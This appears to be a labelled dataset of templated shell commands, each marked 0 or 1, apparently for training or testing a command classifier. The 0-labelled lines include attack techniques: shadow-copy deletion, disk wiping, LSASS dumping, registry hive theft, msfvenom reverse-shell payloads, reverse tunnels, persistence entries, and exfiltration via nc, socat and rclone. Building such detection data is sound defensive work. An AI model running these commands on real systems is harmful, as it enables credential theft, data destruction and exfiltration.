1	cmd.exe /c "echo ${email_content} | mail -s ${email_subject} ${username}@${domain}"
1	powershell -c "echo ${email_content} | mail -s ${email_subject} ${username}@${domain}"
1	echo ${email_content} | mail -s ${email_subject} ${username}@${domain}
1	mail -s ${email_subject} ${username}@${domain} < mail.txt
1	echo ${email_content} | mutt -s ${email_subject} ${username}@${domain}
1	echo ${email_content} | mutt -s ${email_subject} ${username}@${domain} -a attachement.txt
1	cat email.txt | mutt -s ${email_subject} ${username}@${domain}
1	echo ${email_content} | mpack -s ${email_subject} ${username}@${domain}
1	echo ${email_content} | mpack -s ${email_subject} ${username}@${domain} -a attachement.txt
1	cat email.txt | mpack -s ${email_subject} ${username}@${domain}
1	sendmail ${username}@${domain} < mail.txt
1	echo ${email_content} | sendmail ${username}@${domain}
1	cat email.txt | sendmail ${username}@${domain}
1	ssmtp ${username}@${domain} < mail.txt
1	echo -e ${email_content} | ssmtp ${username}@${domain}
1	cat email.txt | ssmtp ${username}@${domain}
1	mstsc /v:${ip_address} /f
1	mstsc /v:${ip_address}
1	mstsc /v:${computer_name} /f
1	mstsc /v:${computer_name}
1	SharpRDP.exe computername=${ip_address} command="${command_to_execute}" username=${domain}\${username} password=${password}
1	psexec \\${ip_address} -i -u ${username} -p ${password} ${command_to_execute}
1	psexec \\${ip_address} -i ${command_to_execute}
1	psexec \\${ip_address} -i -u ${username} -p ${password} ${command_to_execute} -s
1	psexec \\${ip_address} -u ${username} -p ${password} script.txt
1	plink -ssh ${ip_address} -l ${username} -pw ${password}
1	plink ${username}@${ip_address}
0	echo y | plink.exe ${username}@${ip_address} -pw ${password} -2 -4 -T -N -C -R ${ip_address}:${remote_port}:127.0.0.1:${local_port}
0	plink.exe -ssh -l ${username} -N -R ${ip_address}:${remote_port}:127.0.0.1:${local_port} ${ip_address}
0	powershell -c "vssadmin.exe delete shadows /all /quiet"
0	scp -r ${source_directory} ${username}@${ip_address}:${destination_directory}
0	msfvenom -p cmd/unix/reverse_bash HOST=${ip_address} LPORT=${port} -f raw -o reverse.sh
0	scp ${username}@${ip_address}:${destination_file_path} ${source_file_path}
0	msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=${ip_address} LPORT=${port} -f jsp -o reverse.jsp
0	powershell -c "cipher.exe /w:C:"
0	nanodump.x64.exe -w lsassdump.dmp
0	SharpRDP.exe computername=${ip_address} command=${command_to_execute} username=${domain}\${username} password=${password}
0	Compress-Archive -Path ${source_file_path} -DestinationPath ${destination_file_path} -Force
0	reg add "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v ${value_name} /t REG_DWORD /d ${value}
0	wmic /node:"${ip_address}" process call create "cmd.exe /c esentutl.exe /y /vss ${source_file_path} /d ${destination_file_path}"
0	Copy-Item "${local_file_path}" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\"
0	reg SAVE HKLM\SYSTYEM ${local_file_path}
0	rclone.exe copy C:\Users\Public\collect.7z ${account}:backup
0	choco install putty
0	cmd.exe /c "taskkill.exe /f /im ${process_name}"
0	nc -vn ${ip_address} ${port} < ${source_file_path}
0	zip -er archive.zip ${source_directory}
0	red add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /V "Atomic Red Team" /t REG_SZ /f /d "${command_to_execute}"
0	scp ${username}@${ip_address}:${source_file_path} ${destination_file_path}
0	cat ${source_file_path} | socat - TCP:${ip_address}:${port}
0	scp -r ${source_directory} ${username}@${ip_address}:${destination_directory}
0	powershell -c "vssadmin create shadow /for=C:"
0	powershell -c "wmic shadowcopy call create Volume=C:"
0	PsExec64.exe \\${ip_address} -s ${command_to_execute}
